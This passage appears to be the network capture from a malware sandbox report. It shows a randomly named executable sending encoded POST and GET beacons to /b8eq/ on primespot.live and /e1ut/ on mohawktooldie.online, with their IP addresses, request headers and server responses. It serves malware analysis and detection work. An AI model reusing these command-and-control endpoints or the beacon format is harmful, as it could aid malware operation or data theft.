                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.1049995209.74.79.42806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:34.092087984 CET831OUTPOST /b8eq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.primespot.live
                                                            Origin: http://www.primespot.live
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.primespot.live/b8eq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 74 41 6d 59 64 78 47 65 4f 53 54 77 55 6c 45 38 69 2b 35 39 48 56 72 65 51 4e 61 77 74 4f 62 31 38 49 65 65 75 6e 31 70 63 4d 72 31 39 69 63 32 45 58 55 43 4c 6a 30 76 70 37 71 45 63 78 65 72 69 38 46 71 77 45 4c 46 39 65 31 6a 66 76 35 74 66 2f 53 43 4f 52 77 58 45 49 67 65 41 30 58 77 6b 56 72 64 72 6a 6f 72 41 6c 4f 4f 62 50 78 49 4a 59 79 51 78 2b 68 30 34 53 74 57 50 53 45 52 64 37 57 76 50 64 6b 78 52 52 71 32 4d 78 74 77 2b 6b 6f 42 67 73 69 63 5a 6c 4b 79 43 47 36 37 70 6c 59 77 4e 72 52 6e 51 45 30 71 61 4d 78 6e 69 4f 37 68 56 56 4e 67 61 4c 6d 78 51 4e 74 48 56 57 4a 4e 6f 76 39 7a 33 6e 77 4d 31 78 4c 51 6a 67 3d 3d
                                                            Data Ascii: rFbdy=tAmYdxGeOSTwUlE8i+59HVreQNawtOb18Ieeun1pcMr19ic2EXUCLj0vp7qEcxeri8FqwELF9e1jfv5tf/SCORwXEIgeA0XwkVrdrjorAlOObPxIJYyQx+h04StWPSERd7WvPdkxRRq2Mxtw+koBgsicZlKyCG67plYwNrRnQE0qaMxniO7hVVNgaLmxQNtHVWJNov9z3nwM1xLQjg==
                                                            Jan 11, 2025 05:44:34.685017109 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:44:34 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.1049996209.74.79.42806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:36.645860910 CET1844OUTPOST /b8eq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.primespot.live
                                                            Origin: http://www.primespot.live
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.primespot.live/b8eq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 74 41 6d 59 64 78 47 65 4f 53 54 77 55 6c 45 38 69 2b 35 39 48 56 72 65 51 4e 61 77 74 4f 62 31 38 49 65 65 75 6e 31 70 63 4d 7a 31 39 58 49 32 57 47 55 43 5a 54 30 76 6e 62 71 46 63 78 66 33 69 34 67 6a 77 45 58 2f 39 63 4e 6a 65 4e 78 74 4f 39 32 43 62 42 77 58 63 34 67 54 65 45 57 74 6b 56 37 5a 72 6e 30 72 41 6c 4f 4f 62 4d 35 49 4f 4a 79 51 69 75 68 33 73 43 74 61 45 79 46 4d 64 37 4f 2f 50 64 67 50 52 69 79 32 4d 52 64 77 38 57 41 42 74 73 6a 36 63 6c 4b 71 43 47 48 35 70 6c 45 4b 4e 71 6c 4e 51 48 55 71 61 71 68 35 36 73 76 4c 55 47 52 47 63 49 57 6e 43 6f 4d 6d 55 30 34 4c 6e 50 5a 70 6a 31 73 48 78 77 47 42 2b 2f 33 53 68 5a 4f 2b 67 37 30 67 74 6e 67 6d 6a 38 2b 30 32 45 50 71 4f 5a 6d 4d 70 79 7a 78 33 35 79 65 58 30 6a 75 2f 70 73 52 38 78 58 76 42 44 66 71 4c 4f 48 69 71 61 35 51 6f 5a 64 42 4a 49 6e 48 38 63 4a 51 62 62 30 46 31 4d 33 38 2b 36 7a 36 66 79 6a 4e 58 73 6b 6b 33 35 39 47 73 38 52 63 33 51 78 67 51 63 72 49 6c 70 6a 4e 43 75 4a 53 2f 66 4e 4d 64 44 57 56 [TRUNCATED]
                                                            Data Ascii: rFbdy=tAmYdxGeOSTwUlE8i+59HVreQNawtOb18Ieeun1pcMz19XI2WGUCZT0vnbqFcxf3i4gjwEX/9cNjeNxtO92CbBwXc4gTeEWtkV7Zrn0rAlOObM5IOJyQiuh3sCtaEyFMd7O/PdgPRiy2MRdw8WABtsj6clKqCGH5plEKNqlNQHUqaqh56svLUGRGcIWnCoMmU04LnPZpj1sHxwGB+/3ShZO+g70gtngmj8+02EPqOZmMpyzx35yeX0ju/psR8xXvBDfqLOHiqa5QoZdBJInH8cJQbb0F1M38+6z6fyjNXskk359Gs8Rc3QxgQcrIlpjNCuJS/fNMdDWVBhgw7UWrvUOyvUzgar+Mn5D/NX5PMiVzJE6z3Uq416E9qKabprGFX/05Ir8MiZnPfj5RGrNBT5gDRSq66dxEFRjhVneuktQca9OdDXrB3d9OZuyrynwMDez7orZd6ZUPBR8hoztUdmkhhnT2QI3WKWSOJBKByBtVnoBbCVndN9XO9q+9bhi66vhiBRifiROaRPqiAUy9u2pMWCkscf6JTV8XQ64JmT4wNkV+JatLkyrIZKVkk9ZX35A9vYyJpJXvwRm3CZ9/7Dluwd1hPAOj3GQLu+DDYgUzm5hV+r9wRABFo+qas7lXzsz7u02WjzKlvLa6jmzSN5C2NBi6Zh3fPapo+D9pz/mrSPwcNZQVZfem1+0QV29ute+VOBqcKK1pAcj74wbZN+ijSapkrOQETyrZYYrQbyTavpfBxlWN///PyYwWXvIU3gm8mPE/tV4wXZRfPMMCRFCzlCmkma1JvutR4Te8rengqKgwJoQcN6iIa4l6E13cgcr/WKFcDRf3aQZ6VpVbTXmt8JwJNYkO0hWIl7BPWiLY4BlWnwN8tLhZxLTf/OsP1b/biJlElru5X9pAPbKWXdCscDPTlRKIWOx582gnQExOdLLJOcnAwzQnf9fzJvc0w2UJ1osc72SMs7e40KpDbmyI/ZCkM0H5PVK/khDx3wWWaN [TRUNCATED]
                                                            Jan 11, 2025 05:44:37.239341021 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:44:37 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.1049997209.74.79.42806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:39.181746006 CET543OUTGET /b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhn HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.primespot.live
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:39.808773041 CET548INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:44:39 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.1049998208.91.197.27806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:44.854197025 CET825OUTPOST /e1ut/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.mohawktooldie.online
                                                            Origin: http://www.mohawktooldie.online
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.mohawktooldie.online/e1ut/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 53 45 37 74 67 54 32 6e 39 72 54 6e 75 4c 4c 75 31 38 45 79 2b 47 54 66 31 39 77 41 47 33 4a 31 5a 58 39 58 67 61 44 6e 48 2b 69 47 62 39 6b 59 61 66 6e 62 59 48 49 42 79 73 4f 79 53 47 6e 41 46 42 63 65 48 69 72 64 59 49 45 41 38 76 68 5a 70 71 61 30 6c 62 34 4d 4d 57 44 6c 76 61 36 46 59 6a 64 58 4f 38 64 68 6e 76 50 30 37 47 41 4d 35 7a 56 73 6a 47 7a 4e 6b 68 63 6d 68 64 69 70 55 79 36 52 79 37 58 39 44 54 62 65 6c 6a 44 4f 77 4a 71 47 34 64 4d 59 74 77 6c 47 4e 77 54 49 66 74 30 5a 43 38 6c 47 6f 2b 4b 4c 57 50 51 49 75 48 68 6d 78 64 6d 54 39 63 4b 52
                                                            Data Ascii: rFbdy=SE7tgT2n9rTnuLLu18Ey+GTf19wAG3J1ZX9XgaDnH+iGb9kYafnbYHIBysOySGnAFBceHirdYIEA8vhZpqa0lb4MMWDlva6FYjdXO8dhnvP07GAM5zVsjGzNkhcmhdipUy6Ry7X9DTbeljDOwJqG4dMYtwlGNwTIft0ZC8lGo+KLWPQIuHhmxdmT9cKR


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.1049999208.91.197.27806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:47.410501957 CET849OUTPOST /e1ut/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.mohawktooldie.online
                                                            Origin: http://www.mohawktooldie.online
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.mohawktooldie.online/e1ut/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 53 45 37 74 67 54 32 6e 39 72 54 6e 75 6f 44 75 79 61 4d 79 70 32 54 59 77 39 77 41 55 33 4a 78 5a 58 68 58 67 62 33 4a 47 49 61 47 62 66 73 59 62 65 6e 62 62 48 49 42 35 4d 4f 33 57 47 6e 4c 46 42 59 73 48 67 76 64 59 49 67 41 38 71 46 5a 6f 64 32 37 6d 72 34 4b 41 32 44 37 68 36 36 46 59 6a 64 58 4f 38 4a 66 6e 76 6e 30 37 32 77 4d 2f 52 39 76 69 47 7a 4d 74 42 63 6d 6c 64 69 74 55 79 36 76 79 36 4b 59 44 56 48 65 6c 69 7a 4f 7a 59 71 42 33 64 4d 65 77 41 6c 55 47 68 71 4d 47 49 4d 4d 62 4c 63 4d 71 38 4f 46 59 4f 74 50 2f 57 41 78 69 71 36 64 7a 61 2f 37 34 74 74 76 59 49 56 54 65 6f 47 70 58 6e 35 4a 6a 7a 69 35 39 67 3d 3d
                                                            Data Ascii: rFbdy=SE7tgT2n9rTnuoDuyaMyp2TYw9wAU3JxZXhXgb3JGIaGbfsYbenbbHIB5MO3WGnLFBYsHgvdYIgA8qFZod27mr4KA2D7h66FYjdXO8Jfnvn072wM/R9viGzMtBcmlditUy6vy6KYDVHelizOzYqB3dMewAlUGhqMGIMMbLcMq8OFYOtP/WAxiq6dza/74ttvYIVTeoGpXn5Jjzi59g==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.1050000208.91.197.27806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:50.028844118 CET1862OUTPOST /e1ut/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.mohawktooldie.online
                                                            Origin: http://www.mohawktooldie.online
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.mohawktooldie.online/e1ut/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 53 45 37 74 67 54 32 6e 39 72 54 6e 75 6f 44 75 79 61 4d 79 70 32 54 59 77 39 77 41 55 33 4a 78 5a 58 68 58 67 62 33 4a 47 49 53 47 62 74 55 59 55 64 50 62 61 48 49 42 30 73 4f 32 57 47 6e 53 46 42 67 53 48 67 6a 72 59 4b 49 41 75 38 5a 5a 39 5a 69 37 78 62 34 4b 49 57 44 36 76 61 36 55 59 6e 78 54 4f 38 5a 66 6e 76 6e 30 37 30 34 4d 38 44 56 76 67 47 7a 4e 6b 68 63 71 68 64 69 4a 55 79 69 67 79 36 50 74 44 44 33 65 6b 43 6a 4f 32 75 57 42 2b 64 4d 63 7a 41 6b 48 47 67 57 44 47 4d 73 58 62 4f 4a 6e 71 2b 75 46 61 50 5a 4d 6a 6b 4d 31 2f 5a 61 46 77 4a 44 72 33 4b 46 75 42 63 30 50 64 34 6d 77 49 32 51 64 67 6e 76 49 75 39 59 39 73 6d 6d 42 66 2b 52 51 41 78 67 6d 70 71 79 54 78 70 6c 61 6c 50 42 71 4b 44 30 4b 70 73 4f 34 43 39 76 4a 63 76 62 48 42 4f 35 41 4e 41 2f 32 61 30 35 77 53 58 77 6b 66 75 32 49 65 6e 6b 56 63 30 6c 46 5a 5a 6b 71 54 6e 52 78 2f 69 37 38 71 43 63 4e 56 32 57 32 58 63 63 47 48 72 38 67 67 68 2b 6f 36 76 36 35 44 34 4e 36 48 52 77 62 69 73 77 71 71 50 36 62 [TRUNCATED]
                                                            Data Ascii: rFbdy=SE7tgT2n9rTnuoDuyaMyp2TYw9wAU3JxZXhXgb3JGISGbtUYUdPbaHIB0sO2WGnSFBgSHgjrYKIAu8ZZ9Zi7xb4KIWD6va6UYnxTO8Zfnvn0704M8DVvgGzNkhcqhdiJUyigy6PtDD3ekCjO2uWB+dMczAkHGgWDGMsXbOJnq+uFaPZMjkM1/ZaFwJDr3KFuBc0Pd4mwI2QdgnvIu9Y9smmBf+RQAxgmpqyTxplalPBqKD0KpsO4C9vJcvbHBO5ANA/2a05wSXwkfu2IenkVc0lFZZkqTnRx/i78qCcNV2W2XccGHr8ggh+o6v65D4N6HRwbiswqqP6bTeFRc5fBgDoLp6RCDEO5Tfyk92iF05b6Dhf26N2KH/N/dj2uBd7za+GLLeCsn4TMbWcUmizcQHmHCnPYrPm2EsW6yP6o2dr8X3YUh3a9+GsYCGHTWmIjYjzpAV/jHxdibMCHzaUbEOVWRGzHbs4v7/ww5KVh7zBCMocZFyzum1JCWE+1n2ieZSfXyP+i6sAETukqO//X48iqCUrYUJdqQhb05v50P7J2B+vMjE1OmNjYjCWN5IPvgG0yS5am6G9vJFnbYC4qu8Qs8Q01LiR4YOCofVPb0LMP68EvwFerHctjNKYp/jo/Cif5R2edt/241dLQifC4pBzSpW5NJ+537GyoCgyokl1G+VYHB1SPlIZKy4obBsvEQEalTN/+UDSkAUO+I7U5qDwEAUL1t3K1Bld9SgOIv8U29XFcCc9UAsJdjoSpd9x6UCfdT0BgI+phX36dGdECkvDUjtwmuvUUMYgtjFCMxo6gKkjKDjfIUxG95Wrl43A/vNyS5gW9LdyroFTOCqiKs3MSjCFuWUFKH2iPnE2YBfY9u5ABkQZq42/P5xU4SsJy8pv7nrROlUyTRHF/Pv9R+YdYI6VjqznwrqBVsWAUfjkXCMAyNsUeCSeXLrWeorDulMTG9x6fiyHaxSMm7u8jOHhxZ8mfuYItd2C4Fl2QDbXaY5 [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.1050001208.91.197.27806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:52.692398071 CET549OUTGET /e1ut/?UPxHl=S80HqRlhn&rFbdy=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iqwZ8RJUTFht+lVAJMGtZIrPPR90IjtQ== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.mohawktooldie.online
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:53.598170042 CET1236INHTTP/1.1 200 OK
                                                            Date: Sat, 11 Jan 2025 04:44:52 GMT
                                                            Server: Apache
                                                            Referrer-Policy: no-referrer-when-downgrade
                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                            Set-Cookie: vsid=911vr4841162928108477; expires=Thu, 10-Jan-2030 04:44:52 GMT; Max-Age=157680000; path=/; domain=www.mohawktooldie.online; HttpOnly
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Connection: close
